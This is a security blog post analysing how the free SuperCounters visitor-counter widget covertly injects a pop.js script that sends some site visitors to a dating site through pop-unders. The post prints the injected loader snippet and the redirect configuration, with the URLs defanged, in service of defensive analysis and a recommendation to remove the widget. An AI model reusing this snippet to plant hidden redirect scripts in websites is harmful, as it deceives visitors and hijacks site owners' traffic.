• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
SuperCounters

Free SuperCounters Widget Serves Unwanted Redirects to Dating Site

January 10, 2019Rianna MacLeod

FacebookTwitterSubscribe

If we navigate way back into the recesses of our memory to the era of GeoCities websites and MySpace pages, we might distinctly recollect the popularity of the visitor-counting widget.

Visitor Counting Widget Redirects

Commonly displayed on homepages across the web, these widgets served as credibility indicators to help site visitors identify the popularity of a website.

While this feature may have gone out of vogue with current website design trends and advanced analytics tools, they also fell out of favor for bad behavior – from stealing traffic and redirections to planting trojans and malware.

Queue SuperCounters, a free widget site offering a number of tools for site owners to showcase real-time web statistics on their web pages.

Unexpected Widget Behavior

We are regularly commissioned to investigate the source of unwanted redirects and pop-ups on websites. During a recent investigation, we worked on a website that exhibited unexpected behavior. Some visitors who navigated to their pages were being unexpectedly redirected to a dating site.

When inspecting the site traffic, we noticed that the redirect originated from the widget[.]supercounters[.]com/hit.js script used to display the SuperCounter hit widget tool on web pages.

This hit.js counter script loads another script from “hxxp://www[.]supercounters[.]com/fc.php?id=…”

Under normal circumstances, the fc.php file loads functional code (ie. sc_show_hit(515324,33970846, 1, 8);) which is used to display the visitor count in the widget.

SuperCounter – Now with Extra Redirect Features!

While the SuperCounters site doesn’t mention serving advertisements or redirects with its free service, if site visitors meet specific referrer and screen properties, then code similar to the snippet found below is loaded by the fc.php file:

sc_show_hit(920631,93988, 0, 6);var g = document.createElement('script'); g.type = 'text/javascript'; g.async = 'async'; g.src = '//widget.supercounters[.]com/js/pop[.]js'; (document.getElementsByTagName('head')[0] || d.getElementsByTagName('body')[0]).appendChild(g);

Checking the hxxp://widget.supercounters[.]com/js/pop.js script reveals the following variables, which configure a pop-under and redirect the user to the dating site hxxp://mylove[.]is.

//url settings
var gotoURLa = 'hxxp://mylove[.]is'; //madatory, given priority
var gotoURLb = 'hxxp://mylove[.]is'; //optional, 2nd priority
var videoEnb = true; //if video controlling is to be enabled

// ad behaviour
var resetCycle     = 48; //value in Hours                            [Default:6]
var pFXGaps        = 1; //value in Seconds                           [Default:3]
var pFXBubbles     = 1; //number of Ads per user                     [Default:1] 

//total pops (urlA + urlB)
var pFXType        = 3; //1.TabUp 2.TabUnder 3.PopUnder 4.PopUp      [Default:2]

// popup window settings
var pxTop          =    0; //    [Default:   0]
var pxLeft         =    0; //    [Default:   0]
var pFXWidth       = 1370; //    [Default:1370]
var pFXHeight      =  800; //    [Default: 800];

At the current time of writing, 4094 web pages are using this script – the majority of which are from India.

Mitigation

Whenever you install a third-party service on your site (even a super-cool visitor-counting widget), there’s always a risk that you may end up with unexpected functionality – especially if that service is free.

We’d like to encourage website owners to think twice whenever loading third-party scripts, widgets, or elements on their websites. Do some research beforehand and make a backup of your site for quick and easy recovery.

If you’re using the SuperCounters widget, we highly recommend removing it as soon as possible. Replace it with a more reputable tool.

Website owners who are having a difficult time removing unwanted redirects or advertisements from their website can get in touch with us – we’re always happy to help.

FacebookTwitterSubscribe

Categories: Website SecurityTags: Black Hat Tactics, Hacked Websites, Redirects

About Rianna MacLeod

Rianna MacLeod is Sucuri’s Marketing Manager who joined the company in 2017. Her main responsibilities include ghost-writing technical content, SEO, email, and experimentation. Rianna’s professional experience spans over 10 years of technical writing and marketing. When Rianna isn’t drafting content or building templates, you might encounter her hiking in the forest or enjoying the beach. You can find her on Twitter and LinkedIn.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.